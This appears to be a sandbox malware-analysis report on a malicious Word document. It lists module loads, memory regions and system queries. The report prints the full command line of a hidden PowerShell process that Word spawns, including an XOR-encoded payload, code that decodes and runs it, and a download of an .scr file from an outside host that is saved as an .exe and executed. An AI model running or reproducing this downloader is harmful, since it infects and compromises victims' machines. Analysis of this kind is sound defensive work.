5c68185f594c5d051a170b114c3b3d1818571617181857161718183a59415d75125b584a415f58524f183e5843684c051e525b5d1455196c573e58430e0c5f1f171318474e070809151f1b184d195b56565910535368571e58435d4a5b160411037a3c1718185716171818571617184a1242424a5657060c3532571617181857161745357d3f3e484d155a5e5b180442564c511416444c4a1e585018564301510e1004424551561016444c4a3e581e3532571617181857161743357d3f3e314b03445e565f5745010f0e150f1705185541010f004f140c3532571617181857161718185716444c4a1e5850184b1257010e01570b176b4c055f595f16325b474c414c3b3d18185716171818571617181811594518101e58431851570b170803575f1704180442457156597a52565f035e0c1851571d0a180a5e3b3d1818571617181857161718180c3b3d181857161718185716171818571617185a0e42521854440303000d570b177b571940524a4c5962587a4103531f4b4c057f59166b0254444c4a1e585010515b1605111457070111037a3c171818571617181857161718185716174b5d16000101185c0b17105b1f574511101b05020c00421669184b4101015a012c1e5e181757041e181d5745010f0e150f19745d19514350655e0d3a321857161718185716171818574b3a32357d1617181857161718185716174a5d03434556180453560e0e4e0d3a3218571617181857164a35320a'; $sf66692 = n47f6($sf6669); Add-Type -TypeDefinition $sf66692; [n33fc7]::c92f4cc(); Start-Sleep -s 1; $y8cf5 = $env:APPDATA; $t228f7 = $y8cf5 + '\\z79473a.exe'; If (test-path $t228f7) {Remove-Item $t228f7}; $da2f925 = New-Object System.Net.WebClient; $da2f925.Headers['User-Agent'] = 'da2f925'; $da2f925.DownloadFile('http://jadema.com.py/jj/2019 Order File TTYYUGH.scr', $t228f7); Start-Process -Filepath $t228f7; | - |
|
1 |
Module (145)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc030000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee3500000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef89d0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feff380000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee3ce0000 |
|
5 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13fc00000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fef9a00000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x774e0000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feff380000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fef9a83b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fef9a7a13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fef9a81618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fef9a7f088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee36072c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee35760b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee3521a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3575f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee351f000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee350e860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee3503fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee3512380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee3507b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee3507b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee3508730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee3643260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee3643280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee3511f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee3576370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee3564590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee35055b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee3510240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee3503d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee3506d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee3503d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee350e6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee350df40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee3507bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee350fcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee3508b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee3602ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee35142c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee3503e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee350ab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee350a7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee3501550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee350e830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee35013d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee3506660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee3501500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee3503dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee36071e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee35d6d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee36498e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee3649830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feff381320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feff38f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feff3dcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feff411760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff4120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feff3ac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feff3decd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feff3de840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feff3ef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feff3e4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feff3e9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feff3b6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff38a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feff3ef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x774f94f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x774f5f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x774f2b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x774eab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x774f5c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x774ea730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x774ea5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff382270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff40dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff385c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff386330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff3a66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff384710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff3848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff3bb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff3bb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff3c2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff3a58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff3a5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff3baf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff3da0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff412160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff3a5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff3a5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff3a5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff3a5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff3860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff383e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff3d9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff409b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff409aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff409990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff409890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff409770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff3eb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff3eb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff4048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff409470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff4096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff402fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff409cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff408ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff409c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff408e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff403690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff4092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff402e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff403f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff4091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff3e7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff3e7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff3e7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff3e7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff409600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff3e76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff4083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff3b3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff3bd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff3bd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff39caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff3a8a00 |
|
1 | |
| Get Address | Unknown module name | function = 716, address_out = 0x7fee40224c8 |
|
1 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee3e4ae28 |
|
1 | |
| Get Address | Unknown module name | function = 617, address_out = 0x7fee3e4d48c |
|
1 | |
| Get Address | Unknown module name | function = 619, address_out = 0x7fee3e4d5a8 |
|
1 | |
| Get Address | Unknown module name | function = 581, address_out = 0x7fee3e4a6c8 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 1214, y_out = 855 |
|
2 | |
| Get Cursor | x_out = 950, y_out = 338 |
|
1 | |
| Get Time | type = System Time, time = 2019-02-11 09:18:08 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 101587 |
|
1 | |
| Get Time | type = Local Time, time = 2019-02-11 09:18:09 (Local Time) |
|
8 | |
| Get Time | type = Local Time, time = 2019-02-11 09:18:10 (Local Time) |
|
3 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: powershell.exe
724
70
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function n47f6 { param($d17d93) $qfab72a = 'w6788'; $o14135a = ''; for ($i = 0; $i -lt $d17d93.length; $i+=2) { $eb44f = [convert]::ToByte($d17d93.Substring($i, 2), 16); $o14135a += [char]($eb44f -bxor $qfab72a[($i / 2) % $qfab72a.length]); } return $o14135a; } $sf6669 = '02455e565f57654e4b4c125b0c353202455e565f57654e4b4c125b196a4d19425e555d597f594c5d0559476b5d05405e5b5d040d3a324802545b515b57555b594b0416590b0b11550035320c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556183e5843684c0516705d4c2744585b791352455d4b041e7e564c27424518503a59534d54121a174b4c055f595f180744585b76165b5211037a3c17181857161718182c725b54711a46584a4c5f145c5d4a19535b0b0a551f6a35325716171818571617484d155a5e5b180442564c51141652404c12445918711942674c4a577a58595c3b5f554a59054f1f4b4c055f595f1819575a5d114c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556181559585418215f454c4d165a674a570353544c103e5843684c05165b48791352455d4b041a176d711942674c4a5752406b510d531b184d1e5843185e1b78524f680559435d5b031a17574d031642515603165b485e1b795b5c680559435d5b031f0c35325716171818571617637c1b5a7e5548184443101a3c5345565d1b0505165c1b5a1514183258434a4127595e564c570b171a6a035a7a574e127b525557054f15141824534374590442724a4a184417051811575b4b5d5e6b3a321857161718185716444c59035f54185d0f42524a56574058515c577b584e5d3a535a574a0e1e7e564c274245185c12454314183e5843684c0516444a5b5b165e564c57455e425d5e0d3a32357d16171818571617184802545b515b574543594c1e55175156031654010a1102545b105e3b3d18185716171818574d3a321857161718185716171818577f594c68034417555d1350005a5d570b17745716527b515a05574541101902005e0e5f14060e0d1502030d094600060b0d1603551a115e0d3a321857161718185716171818575f5118101a53535e0f1553170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a321857161718185716171818577f594c680344175d5b12555418055771524c68055954795c1344524b4b5f5b525c5e40545214181902005e0e5f14040e0d1502030d094154060c0d40030e0f59435206090d4703050c59551f1e03357d161718185716171818571617515e571e525b5d1455170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a32185716171818571617181857637e564c274245185c00655e425d570b17106d3e5843684c051f0203357d1617181857161718185716174d51194217625d0559170518470d3a321857161718185716171818575f51181056605e4a4c02575b684a1842525b4c5f53545d5b141a175c4f245f4d5d1457064f0c085b16584d4c576c524a575e1f3a321857161718185716171818574d3a32185716171818571617181857161718180553434d4a19160603357d16171818571617181857161745357d1617181857161718185716177a4103536c65182757435b50570b174318474e04091457064f5e5e5b1607400147164a03357d16171818571617181857161771560366434a1802585a59561651525c68185f594c5d05160a187516444450591b1876545418557f7f541854565410441f0c35325716171818571617181857167a594a045e56541634594741102757435b505b1607141802585a59561651525c68185f594c5d051a170b114c3b3d1818571617181857161718183a59415d75125b584a415f58524f183e5843684c051e525b5d1455196c573e58430e0c5f1f171318474e070809151f1b184d195b56565910535368571e58435d4a5b160411037a3c1718185716171818571617184a1242424a5657060c3532571617181857161745357d3f3e484d155a5e5b180442564c511416444c4a1e585018564301510e1004424551561016444c4a3e581e3532571617181857161743357d3f3e314b03445e565f5745010f0e150f1705185541010f004f140c3532571617181857161718185716444c4a1e5850184b1257010e01570b176b4c055f595f16325b474c414c3b3d18185716171818571617181811594518101e58431851570b170803575f1704180442457156597a52565f035e0c1851571d0a180a5e3b3d1818571617181857161718180c3b3d181857161718185716171818571617185a0e42521854440303000d570b177b571940524a4c5962587a4103531f4b4c057f59166b0254444c4a1e585010515b1605111457070111037a3c171818571617181857161718185716174b5d16000101185c0b17105b1f574511101b05020c00421669184b4101015a012c1e5e181757041e181d5745010f0e150f19745d19514350655e0d3a321857161718185716171818574b3a32357d1617181857161718185716174a5d03434556180453560e0e4e0d3a3218571617181857164a35320a'; $sf66692 = n47f6($sf6669); Add-Type -TypeDefinition $sf66692; [n33fc7]::c92f4cc(); Start-Sleep -s 1; $y8cf5 = $env:APPDATA; $t228f7 = $y8cf5 + '\\z79473a.exe'; If (test-path $t228f7) {Remove-Item $t228f7}; $da2f925 = New-Object System.Net.WebClient; $da2f925.Headers['User-Agent'] = 'da2f925'; $da2f925.DownloadFile('http://jadema.com.py/jj/2019 Order File TTYYUGH.scr', $t228f7); Start-Process -Filepath $t228f7; |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Child Process |
| Unmonitor | End Time: 00:01:06, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa00 |
| Parent PID | 0x920 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A04
0x
A18
0x
A1C
0x
A20
0x
A24
0x
A28
0x
A2C
0x
AC4
0x
AE4
0x
AE8
0x
AEC
0x
BA0
0x
BAC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00170000 | 0x00173fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x00180000 | 0x0019ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x001b0000 | 0x001b3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00250000 | 0x0027ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00280000 | 0x002e5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01d0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01deefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001df0000 | 0x01df0000 | 0x01df2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01ebffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01ed0000 | 0x01ed2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01ee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f6ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01feffff | Private Memory | rwx |
|
|
|
- |
| sorttbls.nlp | 0x01ff0000 | 0x01ff4fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02000000 | 0x02007fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002010000 | 0x02010000 | 0x02010fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x020affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x020b0000 | 0x0237efff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll.mui | 0x02380000 | 0x0243ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x024cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024d0000 | 0x024d0000 | 0x028c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortkey.nlp | 0x028d0000 | 0x02910fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x029bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x02ac0000 | 0x02b13fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002b70000 | 0x02b70000 | 0x02b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c20000 | 0x02c20000 | 0x02c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x1ac9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001aca0000 | 0x1aca0000 | 0x1b36ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b370000 | 0x1b370000 | 0x1b470fff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b550000 | 0x1b550000 | 0x1b5cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b640000 | 0x1b640000 | 0x1b6bffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b6c0000 | 0x1b9a1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b9b0000 | 0x1b9b0000 | 0x1baaffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x74e60000 | 0x74f28fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13faa0000 | 0x13fb16fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
